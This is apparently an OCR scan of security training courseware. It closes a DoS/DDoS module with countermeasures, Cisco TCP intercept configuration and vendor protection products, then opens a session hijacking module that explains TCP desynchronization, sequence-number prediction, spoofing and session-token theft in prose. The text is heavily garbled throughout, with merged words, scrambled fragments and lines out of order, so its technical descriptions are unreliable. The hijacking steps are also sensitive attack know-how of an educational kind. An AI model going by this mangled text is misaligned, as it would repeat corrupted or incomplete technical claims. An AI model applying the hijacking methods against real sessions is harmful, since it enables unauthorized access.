provides bandwidthof genuinetraffic,ratherthanthe total bandwidthof all traffic.
an assured
Most ISPssimplyblockall requestsduring a DDoSattack,denying
even legitimate trafficfrom
the service. if an ISPdoes not provide
accessing clean-pipes
services, subscription services
providedbymany cloudservice providers can be used.Thesubscriptionservices serve as an
intermediary,receive trafficdestinedfor the network,filter it, andthen passon onlytrusted
connections.Vendorssuchas Imperva and Verisignoffer services for cloudprotectionagainst
DoSattacks.
ISPsoffer in-the-cloudDDoSprotection
for Internet linksto avoidsaturation due to an attack.
Thistypeof protection attacktraffic to the ISPduring
redirects a n attack.Administratorscan
requestISPsto blockthe original
affectedIPand move their site to anotherIPafter performing
DNSpropagation.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Internet Backbone

a) @)

10:34;D0S/000s
Figure atthe S Plevel
 TCPIntercept
Enabling on CiscoIOSSoftware

1@
To-enable
Intercept
CSCO
105, inthe
TCP
configuration
mode on ure these
commands global

sei 1
tame eRe 9m

ttx 2
1 wep immeap ber Fle ne

1@TeP
interceptcan
me in ther theactive
operate mode
intercept or thepasive watch

(@T h ecommandtase
35 modenthe
the TC?Intercept global
configuration
follows

TCPIntercept
Enabling on CiscoIOSSoftware
Source:https://www.cisco.com
can beenabledbyexecuting
intercept
‘TCP giveni n the belowtable i n the global
the commands
configuration
mode.

{step| Command
access-list-number (deny
Purpose

| an
IP
access-list |
1
| permit)
wildeard
tepany destination destina| ~
Defines
list
access
extended

2
| ip tep intercept
Table
list

10:1:Steps
access-list-number

to enable
TCPintercepton Cisco
0S
| TCP
Enablesintercept

access listachieves
‘An threepurposes:
1.
2.
ofall
Interception requests
ofonlyrequests
Interception fromspecific
originating networks
3.
ofonly
Interception
Typically,
requests
destined
for
specific
servers
an access list definesthe source as any source and the destinationas specific
networks or servers. As it is unimportantto knowwhoto intercept packetsfrom,the source
addresses a re not filtered, Rather,the destinationserver or network to be protected is
identified,TCP intercept can operate i n either the active intercept
mode or passive watch
mode.The
default
In the active intercept
is the intercept

mode,
mode.
the Cisco10Ssoftwareactively
intercepts all inboundconnection
requests (SYN)
replies
and with a SYN-ACK oftheserver, following
on behalf whichit waits for
Module0 Page1360 ical andCountermensores
Mackin Copyright
©
by E-Comel
an acknowledge
(ACK)fromtheclient.Onreceivingthe ACKfromthe client,the server sends
the original
SYN,andthe softwaremakesa three-way handshakewith the server. Oncethe
three-way
handshake
complete,
is
are thetwo halfconnections linked.
In the passivewatchmode,the user sendsconnection requests that passthrough the server,
but they needto wait until the connection is established.If connection requestsfail to establish
within305, thesoftwaresendsa reset request to the server to clearits state,
Belowtable presents the commandto set the TCPintercept modei n the global configuration

Command Purpose

Table
102:C ommand
to set theTCP
watch}

made
intercent
|
intheglobal
SettheTCPintercept
configuration
mode
mode

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

DoS/DDoSProtection Tools
This section discusses
various hardwareand softwareDoS/DDoS protectiontoolssuchas
FortiDDoS, DDoSProtector,ImpervaIncapsula, and Anti DDoSGuardianthat are effectivei n
safeguarding networks
fromDoS/DDoS attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 AdvancedDDoSProtectionAppliances

AdvancedDDoSProtectionAppliances
The following
are examples
for appliances
that provide
advancedprotection
againstDDoS
attacks.
=
FortiDDos-12008
Source:https://www
fortinet.com
FortiDDoS provides
comprehensiveprotection againstDDoSattacks.It helpsprotect
Internet infrastructure
fromthreats and service disruptionsbysurgicallyremoving
networkandapplication layerDDoSattackswhile letting
legitimate
trafficflow without
being
impacted,

ss ee
DDoSProtector
Source:https://www.checkpoint.com
CheckPoint DDoSProtectorblocksDDoSattackswith multi-layered Its
protection.
advantages
are listedas follows:

> Blocks
a widerangeofattacks multi-layered
withcustomized protection

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Behavioralprotectionbase-lining
multipleelementsand blocking
abnormal
traffic
Automatically andpredefined
generated signatures
* Useof advancedchallenge/response
techniques
Fastresponse
time to protect attackswithinseconds
against
+
Automatically networkfloodandapplication
defendsagainst layer
attacks
* Customizedprotectionoptimized needsof
to meet the security a specific
networkenvironment
Quickly filters traffic before it reachesthe firewall to protectnetworksand
as
servers wellas blockexploits
©

©.
Flexible
deployment
Integrated
options
protect
business,to
with CheckPointSecurity
Management
any

10.36:0 005Protector
Figure
TerabitDDoSProtectionSystem
Source:https://terabitsecurity.com
TerabitDD0SProtectionSystem (DPS)is a solutionfor the detectionand subsequent
treatment of DDoSattacks. TerabitDPShelpsensure the maximum availability of a
networkandeliminatesanydisruptions causedbyDoS/DDoS attacks.It can beusedfor
large networksof bandwidthup to 1 Tops.It can alsoprovideprotection for bandwidth
up to 6.4Tbps,

i ee―
Figure
10.37Terabit
0S appliance
‘A10
ThunderTPS.
Source:https://www.a10networks.com
‘A10ThunderThreatProtectionSystem (TPS)ensures reliableaccessto key network
services bydetectingand blockingexternalthreatssuchas DDoSand other cyber-
attacksbeforetheyescalate
into costly Its features
service outages. are listedasfollows:
© with immediateblocking
Customprotection

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ProactiveDD0Sdetectionandmitigation
Combined andcloud-based
on-premises DDOS protection
to blockencrypted
Built-inSSLinspection traffic
> Inboundreputation-based
DDoSprotection
Inbound
andoutbound
advanced
threatprotection

10.38:
Figure ALOThunder
TPS

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DoS/DDoSProtectionTools

of
any
size leetimate
traf
0005protection quickly
Imparvaincapeul mitigates
attacks aeting
without

Protection
DD6S
‘Ant
Tools
oS/DDos
Guardian
(itp:/wwu beetink comm)

(np /wwdosrrest.com)
'005-GUARD(htps//Sdosuerd
net)
Cover httas/mwclouore com)
5 (htos/5.com)

DoS/DDoSProtectionTools
+
Imperva
Incapsula
DDoSProtection
Source:https://www.incapsula.com
ImpervaIncapsula DDOprotection quickly any size attackwithoutdisrupting
mitigates
legitimate
traffic or increasinglatency. It is designed to provide multipleDDoS
optionsand supports
protection
manydefensemethodology.
application
unicast and anycasttechnologies
It automatically detectsand mitigates
hit-and-runevents,andlarge
andserver vulnerabilities,
a
to power many-to
attacksexploiting
botnets.
Incapsula proxiesall web requests
to blockDDoSattacks frombeing relayed
to client
origin servers. Incapsuladetectsand mitigatesany typeof attack,including
TCPSYN+
ACK, TCP FIN,TCPRESET, TCPACK, TCPACK+ PSH, TCPfragmentation, UDP, Slowloris,
spoofing, ICMP, IGMP, flood, force,
HTTP brute connection flood,DNSflood,NXDomain,
mixedSYN+ UDPor ICMP+ UDPflood, pingof death,reflectedICMP& UDP, andSmurf.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Pincepsula
www example
com

‘ratie Secunty

10.39:
Figure Screenshotof neapsula
DDOS
protectiontal

following
‘The are examples
for additionalDDoSprotection
tools:
=
Anti DDOS (http://www.
Guardian beethink.com)
*
DOSarrest’s
DDOS service (https://www.dosarrest.com)
protection
=
(https://ddos-guard.net)
DDOS-GUARD
Cloudflare(https://www.cloudflare.com)
FS(https://f5.com)

Module1 0Page
1267 ical andCountermensores
Mackin
©
by
Copyright E-Comel
 DoS/DDoSProtectionServices

Protection

Gaamai

DoS/DDoSProtectionServices
=
AkamaiDDoSProtection
Source:https://www.akamai.com
provides
‘Akamai DDoSprotection regularly
for enterprises targetedbyDDoSattacks.
KonaSite Defenderdeliversmulti-layered
‘Akamai defensethat effectively
protects
websitesandweb applications
against threat,
the increasing sophistication,
andscaleof
DDoS
attacks.
Kona Site Defenderprovidesunmatchedweb and application
protection,which is
deliveredthroughan intelligent
platform
with more than210,000servers over 120
countries. Network-layer
DDoStraffic is deflectedand application
layerDDoStraffic is
absorbed edge,
i n the network while mitigationcapabilities
are implemented
natively
in-path,
protecting
Site Defenderhasa
againstapplication
attacksin the cloudbeforetheyreachthe
against
highly
scalableweb application
layerattacksin HTTPandHTTPS
firewall (WAF)
traffic,
client
offeringorigin.
Kona
protection
providing
a completeDDoS
protection to maintain web performance
solutionfor enterprises andavailability.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 10.40:Akama
Figure 000Sprotection
service

Thefollowing
are examples
foradditional
DDoSprotection
services
+
DDoSProtectionTool(https://www.kaspersky.com)
Kaspersky
+
StormwallPRO(https://stormwall.pro}
+
(https://www.corero.com)
Corero NetworkSecurity

Nexusguard
(https://mww.nexusguard.com)
(https://www.blockdos.net)
BlockDoS

Module1 0Page
1369 tical andCountermensores
Making by Comet
Copyright©
 Module Summary

In
this
mod, we havediscussed
thefollowing
of Dena of Service(00S)
concepts andDistributed
DelabotService
(008s)attacks

\Vevious
types
of attacks
005/0005
of botnetsalongwiththebotnetecosystem
Concepts
1005 the008s Attackon GitHub
stun detailnamely
case

Vrious 09$/0005
attacktools
Weconcluded with a detailed cussion on various countermeasures
thatre to be
‘employe
to preventDoS/D00S attacksslongwthvarious hardware and sofware
os /000Sprotection ool

nthe nextmodule,
we wildass in detailhowattackers,= wellas
ethical
and
hackers

Module Summary
In this module,we discussed concepts relatedto denial-of-service (DoS)anddistributed denial:
of-service(DDoS) attacks.We alsodiscussed various typesof DoS/DDoS attacks.Additionally,
thismodulediscussed concepts relatedto botnetsalong withthebotnet ecosystem. Further,a
detailed case studyof a DDoSattack on GitHub was presented. Moreover, this module
illustrated
various DoS/DD0S attacktoolsandconcluded with a detaileddiscussion on various
countermeasures to preventDoS/DDoS attacks, alongwith various hardwareand software
Do0S/DDoS protection tools.
In thenext module, we will discuss i n detailhow attackers, as well as ethicalhackersandpen-
testers,perform session hijacking to steala validsession ID.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module11:
SessionHijacking
 Module Objectives
Sesion Hijacking
Understanding Concepts

Understanding LevelSesion
Applicaton Mischng

Sesion Hijacking
Network Level
Understanding

OferentS ession
Understanding Countermeasures
Hacking

Module Objectives
Sessionhijacking
allowsattackersto takeover an active session bybypassing
the authentication
process. theycan perform
Thereafter, anyaction on the hijacked system
Thismoduleaims to provide comprehensiveinformationon session hijacking. It starts with an
introductionto sessionhijacking
conceptsand provides insight into session hijacking at the
applicationand networklevels.Later,the modulediscusses tools used to hijack a session
betweena clientand server. It alsodiscussesvarious countermeasures to defendagainst
sessionhijacking
attacks.

*
module,
will
At theendofthis

Describe hijacking
session
you
concepts
beableto dothe following:

levels essionhijacking
Perform application
+
Perform
networklevelsessionhijacking
Usedifferentsession hijacking
tools
session hijacking
Apply countermeasures

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

01
~ Hijacking
Session Concepts
[NetworkLevelSes
yea

02 pplicationLavelSession
Hijacking

SessionHijacking
Concepts
Familiariztion with basicconceptsrelated to session hijacking is importantto attain a
comprehensive Thissection explains
understanding, what session hijacking
is as well as the
reasons whysession hijacking
succeeds.It alsodiscussesthe session hijacking
process,packet
analysisofa locals essionhijack, sessionhijacking
typesofsessionhijacking, in an Open
Systems
Interconnection (OSI)model, anddifferencesbetweenspoofing
andhijacking.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is SessionHijacking?

ofa
‘control
valid
CP communication
session betweentwo

most authentications
‘As
thisallows
‘seesion, theattacker TCP
onlyacura thestart ofa
to gi naccess to amachine

_tackers
can sil thetraf romthe established
TCP
sessions
‘and
performldentiythe, information
thet,feud et

Theattacker
sta
2 vad ssson IOanduses to autheniate

What is SessionHijacking?
A web server sendsa session identification
tokenor keyto a web client aftersuccessful
authentication.Thesesession tokensdifferentiatemultiple
sessions that the server establishes
with clients.
Webservers usevarious mechanisms to generaterandomtokensandcontrols to
secure the
tokens
Sessionhijacking
duringtransmission,
is an attack i n which an attackertakesover a valid Transmission Control
Protocol(TCP) communication session between two computers. Becausemost typesof
authenticationare performed onlyat the start of a TCPsession,an attackercan gainaccess toa
machine while a sessionis i n progress.Attackers can sniffall the trafficfromestablished
TCP
sessions andperform identity theft,informationtheft,fraud, ete.
A session hijacking attackexploits a session-token generation mechanism or token security
controlsso that theattackercan establishan unauthorizedconnection with a targetserver. The
attackerc an guessor steala valid session ID,whichidentifiesauthenticatedusers,and use it to
establish a sessionwith the server. Theweb server responds to the attacker's under
requests
the impressionthat it is communicating with an authenticateduser.
Attackerscan use session hijacking to launchvarious kindsof attacks, suchas man-in-the.
middle (MITM) and denial-of-service(DoS) attacks.In an MITM attack,a n attackerplaces
themselvesbetweenan authorizedclient and a server by performing session hijacking to
ensure that information flowingin either directionpasses throughthem. However, the client
and server believetheyare directly communicating with eachother.Attackerscan alsosniff
anddisrupt
sensitive information sessionsto launch a DoSattack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Victim
=—
J
Server
__Oatatrmaminion
Web
OatsTreamiion A

attacker
of session
gure1.1: Example jacking

Module8 1275
Page tical MakingandCountermensores
by Comet
Copyright©
 Whyi s SessionHijacking
Successful?

Absence of account lockoutfor invalid

session IDs 1 Indefinitesession timeout

generationalgorithm
Weaksession1D usingTCP/IP
Mostcomputers are
smallsession
‘or Ds vulnerable

h andling Mostcountermeasures donot work

Insecure " of session
1s withoutencryption

Whyis SessionHijackingSuccessful?
hijacking
Session succeeds of the following
because factors.
Absence IDs: If a websitedoesnot implement
of account lockoutfor invalid session
account lockout,an attackercan makeseveralattempts to connect with varyingsession
IDs embeddedi n a genuineURL.Theattackercan continue making until the
attempts
actualsessionIDis determined.Thisattackis alsoknownas a brute-forceattack.During
a brute-forceattack,
the web server doesnot display or complaint,
a warningmessage

the to the
Weaksession-ID
valid
allowing attacker determine
generation algorithm
sessionID.
or smallsessionIDs:Mostwebsitesuse linear
algorithms to predict
variables suchas time or IP address for generating sessionIDs. By
studying the sequential patternandgenerating multiple requests,an attackercan easily
narrow the search
generation
is short.
spacenecessary forge
i s used,
algorithm to
a validsession ID. Even if a strong
an active sessionID can be easily
session-ID
determinedif the string

Insecurehandling of sessionIDs:An attacker can retrieve stored

session-IDinformation
bymisleading the user'sbrowserinto visitinganothersite. Beforethe session expires,
the attackercan exploitthe informationi n manyways,suchas Domain NameSystem
{ONS) exploitation,
poisoning,cross-sitescripting andthe exploitationof a bugin the
browser.
Indefinites ession timeout: SessionIDswith an indefinite time provides
expiration an
attackerwith unlimitedtime to guess a valid session ID. An example of this is the
“rememberme―
optioni n manywebsites.Theattacker can use static sessionIDsto the
user'sweb account after capturing cookiefile. Theattackercan also perform
the user’s

ical andCountermensores
Mackin ©by E-Comel
Copyright
session hijacking logs
if theycan breakinto a proxyserver, whichpotentially or caches
session IDs.
computers
‘Most usingTCP/Internet Protocol(IP)
are vulnerable:All machinesrunning
TCP/IPare vulnerableto session hijacking
becauseof the design flawsinherent i n
TcP/P
‘Mostcountermeasures donot workwithoutencryption: It is easyto sniffs essionIDsi n
a flat networkif transport is not set up properly
security during the transmission of
sessionID cookies, even if a web applicationusesSecureSockets Layer (SSL) encryption
attacker'staskbecomeseven easier if theycapturesessionIDscontaining
‘An actual
login information.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Session Hijacking
Process

Commandajetion
|a
Sutin pce athe

SeasiontD
|
Prediction
to

=
theeing

Cm
&
sis
A
lg il

¢

SessionHijackingProcess
It is easier for an attackerto sneakinto a systemas a genuineuser than to enter a system
An attacker
directly. can hijack sessionbyfinding
a genuineuser’s an established sessionand
takingit over after user authentication.After hijacking
the session, the attackercan stay
connectedforhourswithoutarousingsuspicion.During this period,
all trafficintendedforthe
user'sIPaddressgoes to the attacker'ssystem instead,
andthe attackercan plantbackdoors or
gainadditional hijacks
Here,we examine howan attacker
accessto the system. a session.

CommandInjection
|a tothe
target
inectingpachts
Start
sever
a om
| thNof
Monitor
pea
ow
Maoito

am 11.2Session
Figure hijacking
process

ical andCountermensores
Mackin ©by E-Comel
Copyright
 hijacking
Session into threebroadphases.
can bedivided

Tracking
the connection
Theattackeruses a networksnifferto track a victim and hostor uses a tool suchas
Nmapto scan thenetwork fora targetwitha TCPsequence that is easyto predict.
After
identifying the attackercaptures
a victim, the sequence andacknowledgment numbers

Of thevictim because
TCPchecks
to construct packets
thesenumbers.
Theattacker
then usesthesenumbers

Desynchronizing
the connection
desynchronized
‘A state occurs when a connection between a targetand host is
established,
or stablewith no data transmissionor the server'ssequence
numberis not
equal acknowledgment
to the client’s number,
or vice versa.

To desynchronize the connection betweenthe targetand host,the attackermust

change the sequence numberor acknowledgment number(SEQ/ACK) of the server. For
this purpose,the attackersendsnulldatato the server; consequently, the server's
SEQ/ACK numbersadvance, while the targetmachinedoesnot register the increment.
For example, beforedesynchronization, theattackermonitorsthe sessionwithout any
interference,
followingwhichtheysenda large amount of nulldatato the server. These
data change the ACK numberon the server without affecting anything else,thereby
desynchronizing
‘Another
the
approach
server andtarget.
is to senda reset flag to the server to breakthe connection on the
server side.Ideally, this occurs i n the earlysetupstageoftheconnection.Theattacker's
goalis to breakthe connection on the server sideand create a new connection with a
differentsequence number.
Theattackerwaits for a SYN/ACK packet fromthe server to the host.On detecting a
packet, the attackerimmediately sendsan RSTpacket and a SYNpacket with identical
parameters, suchas a portnumberwith a differentsequencenumber, to the server.
The server, on receiving the RSTpacket, closesthe connection with the targetand
initiates anotherone based o n the SYNpacket butwitha differentsequencenumber on
the same port.After opening a new connection,the server sendsa SYN/ACK packet to
the targetfor acknowledgement. The attackerdetects(butdoesnot intercept) this
packet and sendsan ACKpacket to the server. Now, the server is i n the established
state. The ai m is to keep the targetconversant and ensure that it switchesto the
establishedstate on receivingthe first SYN/ACK packet fromthe server. Consequently,
boththe server andtarget are desynchronized but i n an established state.

attackercan alsouse a FINflag,

‘An butthiswill makethe server respondwith an ACK
packet, thusrevealingthe attackthroughan ACKstorm. Theattackis revealedbecause
of a flawi n thismethodof hijacking
packet, the host acknowledges
unacceptable packetgenerates
a TCPconnection.
it bysending
an ACK packet,
the expected
thereby
an
Whilereceiving unacceptable
sequencenumber.This
creating an endlessloopfor
everydatapacket. Themismatchi n SEQ/ACK numbersresultsin excess networktraffic

ical andCountermensores
Mackin ©by E-Comel
Copyright
with both the server and targetattemptingto verifythe correct sequence,Because
these packets carry no data, retransmission does not occur if the packetis lost
However,becauseTCPuses IP,the lossof a single packet ends the unwanted
conversation betweenthe server andtarget.
attackercan add a
‘An desynchronizing
stageto the hijacksequenceto deceive the
targethost.Without desynchronizing,
the attackerinjectsdata into the server while
keeping
their identity
hiddenbyspoofing
an IP address.
However, the attackershould
ensure thatthe server to the targethostas well
responds
Injecting
the attacker'spacket
the attackerhasinterrupted
‘Once the connection betweenthe server and target,they
can eitherinjectdatainto the networkor actively as the man i n the middle,
participate
passingdatafrom the targetto the server and vice-versa while reading
and injecting
at
data will

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Packet Analysis
of a Local SessionHijack

scxenss.e om a9

seccerseacon) uae
BDtne
prea
stacker

Packet Analysis
Session
of
hijacking
aLocal SessionHijack
involveshigh-level
attackvectors,whichaffectmany systems. TCPis usedfor
data bymanysystems
transmitting that establishLANor Internetconnections.Forestablishing
a connection betweentwo systems and for the successful transmission of data,the two
systemsshouldperform a three-wayhandshake. Sessionhijacking of
involvesthe exploitation
thisthree-wayhandshake methodto takecontrolover the session.
hijacking
To conducta session theattackerperforms
attack, threeactivities:
©

=
ofa ofthe
Trackingsession
session
Desynchronization

Bysniffing
of during
Injection commands the session
networktraffic,
or
an attackercan monitor track a session. Thenext stepi n session
hijacking
is to desynchronize
the session. It is easyto accomplish
this attackif the attacker
knowsthe next sequence number(NSN) usedbythe client.A session can be hijacked byusing
that sequencenumberbeforethe clientuses it. Thereare two possibilities to determine
sequencenumbers:o ne is to sniffthe traffic,find an ACKpacket, andthendeterminethe NSN
basedo n the ACKpacket. Theotheris to transmit datawithguessed sequence numbers, which
is not a reliablemethod.If the attackercan accessthe networkandsniffthe TCPsession,they
can easily determinethe sequence number.Thistypeof session hijackingis called"localsession
hijacking.―

ical andCountermensores
Mackin ©by E-Comel
Copyright
 belowfigure
‘The analysis
showsthe packet ofa locals essionhijack.

According
Pocket
analysis
Figure11.3:
to above figure,
local
session
hijack
the next expected
ofa

sequencenumber is 1420.If the attacker

transmits that packet theycan desynchronize
sequencenumberbeforethe user does, the
connection betweenthe user andserver.
If the attackersent the datawith the expected
sequencenumberbeforethe user could,
the
server
synchronized
wouldbe
leads
towiththeattacker.
betweenthe attackerand server. Then,
believing packet.
the correctsequencenumber,
This
it to bea resent
theestablishment
of
a connection
the server woulddropthe data sent bythe user with
The user is unaware of the
attacker'saction and mayresendthe datapacket becausethe user doesnot receive an ACKfor
their TCPpacket. However,the server woulddropall the packetsresent bythe user. Thus,the
locals essionhijacking
attackis successfully
completed.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Types
of SessionHijacking

Passive
(©na passive attack,an attackerhijacksa session but sits back,w atches,
and
a l thetrafficin that session
records

active
atack,an
1@nan an attacker
finds activesession andseizescontrolof

tackee Vici

‘Types
of SessionHijacking
hijacking
Session can be either active orpassive, dependingon the degree of involvementof
the attacker.Theessentialdifferencebetweenan active andpassivehijack i s thatwhilean
active hijack session,a passivehijack
takesover an existing monitors an ongoing session
Passive
Session
Hijacking
Ina passiveattack,afterhijacking a session,an attacker onlyobserves andrecordsall
the traffic during the session. A passive attackuses snifferson the network, allowing
attackers to obtaininformation suchas user IDsandpasswords. Theattacker
can later
use thisinformationto logi n as a valid user and enjoy the user'sprivileges.Password
sniffing
password
is the simplest

systems suchas S/KEY) to ticketing

to
attack to obtainraw access a network.
involvesmethodsthat range from identificationschemes(forexample,
Counteringattack
identification(forexample,
one-timethis
Kerberos).
Thesetechniques helpin protecting datafromsniffing attacks,but theycannot protect
against active attacksif thedataare unencrypted or do not carry a digital
signature.
Hijacking
ActiveSession
In an active attack,a n attackertakesover an existingsessioneither bybreakingthe
connection on one sideof the conversation or byactively An example
participating. of
an active attackis a man-in-the-middle(MITM) attack.To perform a successful
MITM
attack, the attackermust guessthe sequencenumberbeforethe targetresponds to the
server. Onmostcurrent networks,
operating-system
whichmakesit difficultto predict
sequence-number
numbers.
sequence
predictiondoes work,
(0S)vendorsuse randomvaluesfor the initial sequencenumber, not
because

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionHijacking
in OSIModel

| Networklove hijacking
canbedefinedastheinterception
Network Level of packets thetransmission
during between a client
and
Hijacking theserver in a TCPor UDP
session
Application
Level
Hijacking | Application
@
hijacking
gaining
HTTP'scontrol
user
levet
session
refersto
byobtaining
the session Ds
over the

SessionHijacking
in OSIModel
Thereare two levelsof session hijacking
i n the OSImodel:the networkleveland application
level.
=
NetworkLevelHijacking
Networklevelhijacking of packets
is the interception during the transmissionbetweena
client and server i n a TCP/User DatagramProtocol(UDP) session. A successful
attack
provides the attackerwith crucialinformation, which can be further used to attack
application levelsessions, Attackersmost likelyperform networklevelhijacking because
theydo not need to modifythe attack on a per-web-application basis.Thisattack
focuseso n thedataflowof the protocol sharedacross all webapplications.
‘Application
LevelHijacking
Application hijacking
level Transfer
involvesgainingcontrolover the Hypertext Protocol
(HTTP)
user session byobtaining the session IDs.At the application
level,
the attacker
gainscontrolof an existing
sessionandcan create new unauthorized sessionsbyusing
stolendata.In general,
bothoccur together, depending on the systembeingattacked.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Spoofing
vs. Hijacking

Spoofing
bAttack
to euser
or
(©A n attachepretends another
imachne(tm) to gin access
{©Sessionhacking proces
ofanexiting
Hijacking
a ctiveSesiontheof
sezing conto

not
(a T hestacker does
active seston of
on
oriis
season usingthe viet
sire contol
he she
instead,
exiting
new
stolencredentials
(Theattacker
rimecton
eles
and ontheereate
lagitiate
authenticate
wero

Fak ao

Spoofing
vs. Hijacking
In blind hijacking,

hijacking,
an attackerpredicts
a connection that appearsto originate
it is important
the sequencenumbersthat a victim hostsends create
fromthe hostor a blindspoof.
to understandsequence-number prediction.
To understandblind
TCPsequencenumbers,
to
which are unique per bytei n a TCP session,provideflow controland data integrity. TCP
segments provide the initial sequencenumber(ISN) as a partof eachsegmentheader.ISNsdo
not start at zero for eachsession. As partof the handshake process,eachparticipant
needsto
state the ISN, andbytes a re numberedsequentially
fromthat point.
Blindsession hijacking
attackeris unablespoof a trustedhoston a different
becausen o route existsfor the packets
networkandobserveor
relieson the attacker'sabiltyto predict guesssequencenumbers.An
the replypackets
to return to the attacker'sIPaddress.Moreover,the
attacker is unableresort to Address ResolutionProtocol(ARP) cachepoisoningbecauserouters
do not broadcast ARPacrosstheInternet.Because theattackeris unableto observethe replies,
‘they
must anticipatethe responses from the victim and preventthe host from sending a
TCP/RST packetto the victim. Theattackerpredicts sequencenumbersthat the remote host
expectsfromthe victim andthen hijacks the communication. Thismethodis usefulto exploit
the trust relationships
betweenusersandremote machines.
In a spoofing
attack,an attackerpretends to beanotheruser or machine(victim) to gainaccess
Insteadof taking active session,the attacker
over an existing initiates a new sessionusingthe
stolencredentials.Simple
vietim’s IPspoofing is easyto perform and is usefuli n various attack
methods.To create new raw packets, the attackermust have root access on the machine.
However, to establisha spoofedconnection usingthis sessionhijacking technique, an attacker
must knowthe sequence numbersusedbya target machine.IP spoofing forcesthe attackerto

ical andCountermensores
Mackin ©by E-Comel
Copyright
 theNSN,Whenan attackerusesblindhijacking
forecast theycannot view
to senda command,
the response.
In the case of IP spoofing without a session hijack, guessingthe sequence number is
unnecessary becauseno currently opensessionexistswith that IPaddress.In a sessionhijack,
the traffic returns to the attackeronly if source routingis used.Source routing is a processthat
allowsthe senderto specify the route to be taken byan IP packet to the destination.The
attackerperforms source routing and then sniffsthe traffic as it passesbythe attacker.In
session spoofing, captured authentication credentials are used to establish a session. In
contrast, active hijacking eclipses a pre-existing session. As a resultof this attack, a legitimate
user mayloseaccessor the normalfunctionality of their established
Telnets essionbecausea n
attackerhijacks the session and acts with the user'sprivileges. Becausemost authentication
mechanisms are enforced onlyat the initiation of a session,theattackercan gain accessto a
targetmachinewithoutauthenticationwhilea session is i n progress.
Anothermethodis to use source routed IP packets.
Thistypeof MITM attackallowsan attacker
to becomea partof the target-host conversation bydeceptivelyguidingIP packetsto pass
throughtheir system.
Sessionhijackingis the process of taking over an existingactive session. An attackerrelies on a
legitimate
user to makea connection andauthenticate.Session hijacking is more difficultthan
spoofing.
IP address In session hijacking, John(anattacker) wouldseekto insert himselfinto a
sessionthat James (2legitimate user)already had set up with \\Mail. Johnwould wait until
Jamesestablishes a session,displace Jamesfromthe established session bysome means, such
as a DoSattack, and thenpickup the sessionas though he were James.Subsequently, John
send a scripted
‘would set of packets to \\Mail andobservethe responses.For this purpose,
Johnneedsto knowthesequence
sequencenumber,
process,
in
number use whenhe hijacked
he must knowthe ISNandthe numberof packets the
thesession.Tocalculate
involvedi n the exchange

sessionhijacking
Successful is difficultwithoutthe useof knowntoolsandis only possible when
severalfactorsare underthe attacker'scontrol. Knowledge of the ISN is the leastof John’s
Forinstance,
challenges.
a
Johnneeds methodto displace
as a methodto knowthe exact status of James's
BoththesetasksrequireJohnto havefarmore knowledge
James
from
the
active sessionas well
session at the moment that Jamesis displaced
and controlover the sessionthan
wouldnormally be possible.
However, spoofing
IP address attackscan onlybesuccessful
if an attackeruses IP addresses for
authentication.They cannot perform IP addressspoofingor session hijacking if per-packet
integritycheckingis executed.In the same manner, IP addressspoofing or session hijacking is
possible
‘not ifthe sessionusesencryption methodssuchasSecureSockets Layer (SSL) or Point-
to-Point Tunneling Protocol(PPTP). Consequently,the attackercannot participate i n the key
exchange.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 James
(Victim)
og Server

John (Attacker)
11.5:Spoofing
Figure attack
togs
James o n to the
withhiscredentials
server

<
Predictthe |
James and kills
sequence
(vietim) James’
connection

John (Attacker)

In summary, the hijacking of non-encrypted TCPcommunicationsrequiresthepresence of non-

encrypted session-oriented traffic,the ability to recognize TCPsequence numbersfromwhich
the next sequencenumber(NSN) can be predicted, and the ability
to spoof a host’s
media
access control(MAC) or IP address to receive communicationsthat are not destinedfor the
attacker'shost. If the attacker is on the localsegment, theycan sniffand predict the ISN+ 1
numberand route the trafficbackto them bypoisoning theARPcaches o n the two legitimate
hostsparticipating in the session.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

[NetworkLevel So
01 Session Hijacking
Concepts ijeckng

= Application
Level 5
02 ijacking

05 Countermeasures

Application
Level Session Hijacking
|G. Ina session hijacking
attack, session
3 token stolenora val seston tokenis rected to gainunauthorized

sifing
Session
{A sossion tokencan be compromised
in various

Prasictable
ways
session token

[Map-n-the-middle
attack ‘Man-in-the-browser
attack

Crosssitscripting
(SS)attack Crosssite forgeryattack
request

Sessionreplay
attack Sesson fuatonattack

CRIME
stack Forbidden
atack

BDI session donation

tack

Level SessionHijacking
Application
In application
level hijacking,
the attackerobtains the session IDs to gain control over an
s essionor to create a new unauthorized
existing application
s ession,Thissection discusses level
sessionhijacking
and various methodsto compromise the session token,
suchas session
sniffing
andthe use of predictable
sessiontokens.

ical andCountermensores
Mackin ©by E-Comel
Copyright
In application
levelsession hijacking,an attackerstealsor predicts a validsession to gain
unauthorizedaccess to a web server. Usually, networklevel and application level session
hijacking
occur together becausea successful networklevelsessionhijack provides an attacker
with ampleinformationto perform applicationlevel session hijacking.
Applicationlevel session
hijacking
relieson HTTPsessions.
attackerimplements
‘An various techniques suchas stealing,guessing,and brute forcing to

a
obtain valid session ID,whichhelps
progress. control
i n acquiring
a over valid user's session whileitis i n

Stealing: Attackersuse different techniques to stealsessionIDs.An attackercan steal

the session keythrough physical access by,for example, acquiringthe files containing

alsouse sniffing
‘can of
sessionIDsor memorycontents either the user’s systemor the server. Theattacker
toolssuchas Wiresharkor SteelCentral PacketAnalyzer
trafficbetweentheclientandserver to extract the sessionIDsfromthe packets.
to sniffthe

Guessing:
An attackerattemptsto guessthe session IDsbyobserving
session variables.
In the case of sessionhijacking,
the rangeof sessionID valuesthat can beguessedis
limited.Thus, guessingtechniques
